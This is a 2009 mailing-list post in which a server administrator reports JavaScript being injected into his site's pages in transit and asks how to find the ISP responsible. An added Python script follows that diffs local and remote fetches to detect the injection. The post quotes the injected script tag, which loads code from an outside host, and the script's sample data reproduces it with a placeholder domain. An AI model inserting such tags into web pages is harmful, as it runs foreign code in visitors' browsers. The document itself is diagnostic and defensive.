Jaco Kroon on Sun, 3 May 2009 09:27:04 +0200 (SAST)
[GLUG-tech] possible http threat - or just some weirdness
Hi all,

One of my clients just notified me of a "threat" on one of my servers. When I request the site via Mozilla Firefox, the first lines read as follows:

    <script language=javascript src=http://phpl.ca/Img/pen.gif></script>
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
    <html>

I get the same with wget from my desktop machine. If I request this on the server itself using wget, I get this as is, without the first script line. This to me (without going the tcpdump route on the server itself) indicates that my data is being modified in transit!

Now, we all know this is perfectly possible; the question is, how do I figure out where this is happening, and which ISP I should get to clean up? Based on my incoming path this is either SAIX or IS, and I rather suspect it will be SAIX's transparent proxies, but how do I confirm that?

If this wasn't happening on each and every single request I'd say we have a possible split-response HTTP proxy poisoning attack, but those are generally not overly reliable and were still under heavy research last I checked.

I've made a copy of pen.gif (which, as expected, turns out to be JavaScript code). What else should I be gathering around this?

Jaco
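The comparison Jaco describes (fetch the page on the server itself, fetch it again from a client across the suspect path, and look at what differs) can be scripted so it can be repeated from several vantage points. The following is an added example, not code from the original post: it flags anything that appears before the DOCTYPE, extracts any external script sources found there, and produces a line diff between the two fetches. The two responses are constructed samples using a placeholder domain (injector.example), not captures from the affected server.

```python
"""Detect content injected ahead of a page's DOCTYPE and diff two fetches of
the same URL: one taken on the server itself, one taken from a remote client.
Added example; the sample responses below are constructed, not real captures."""
import difflib
import re
import urllib.request

# Constructed "remote" fetch: a foreign <script> has been prepended to the page.
REMOTE_RESPONSE = (
    '<script language=javascript src=http://injector.example/pen.gif></script>\n'
    '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" '
    '"http://www.w3.org/TR/html4/loose.dtd">\n'
    '<html><head><title>Example</title></head><body>hello</body></html>\n'
)
# Constructed "local" fetch: what the server itself serves (no prepended line).
LOCAL_RESPONSE = REMOTE_RESPONSE.split('\n', 1)[1]

DOCTYPE_RE = re.compile(r'<!DOCTYPE', re.IGNORECASE)
# Matches <script ... src=VALUE> with or without quotes around the value.
SCRIPT_SRC_RE = re.compile(
    r'<script[^>]*\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.IGNORECASE)


def preamble_before_doctype(html):
    """Return whatever precedes the DOCTYPE declaration, stripped of whitespace.

    A well-formed document has nothing meaningful there, so any markup in the
    preamble is a strong sign the body was altered. Returns None when the page
    has no DOCTYPE at all (then this check does not apply)."""
    m = DOCTYPE_RE.search(html)
    if m is None:
        return None
    return html[:m.start()].strip()


def injected_script_sources(html):
    """List external script URLs that sit before the DOCTYPE (evidence to keep)."""
    pre = preamble_before_doctype(html)
    if not pre:
        return []
    return SCRIPT_SRC_RE.findall(pre)


def diff_fetches(local, remote):
    """Return only the added/removed lines between the local and remote fetch.

    An empty list means the two copies are line-for-line identical; any '+'
    line is content that appeared somewhere between the server and the client."""
    changed = []
    for line in difflib.unified_diff(local.splitlines(), remote.splitlines(),
                                     'local', 'remote', lineterm='', n=0):
        if line.startswith(('+++', '---', '@@')):
            continue  # skip diff headers and hunk markers
        if line.startswith(('+', '-')):
            changed.append(line)
    return changed


def fetch(url, timeout=10):
    """Fetch a URL as text for a real comparison run (not called in this example).

    Run this once on the server (or via its loopback/LAN address) and once from
    each client vantage point, then pass both results to diff_fetches()."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode('utf-8', errors='replace')


def assess(local, remote):
    """Summarise the comparison as a dict suitable for logging or a ticket."""
    return {
        'modified_in_transit': local != remote,
        'preamble_scripts': injected_script_sources(remote),
        'changed_lines': diff_fetches(local, remote),
    }


if __name__ == '__main__':
    for key, value in assess(LOCAL_RESPONSE, REMOTE_RESPONSE).items():
        print(f'{key}: {value}')
```

To narrow down which hop is responsible, repeat the comparison from vantage points that take different paths (a host on another ISP, the server's own loopback address, the site by raw IP rather than hostname, and over HTTPS if available): a transparent proxy that only sees plain HTTP on one upstream will show up as the single path on which the diff is non-empty. Save the raw responses from every run, since they are the evidence the ISP will ask for.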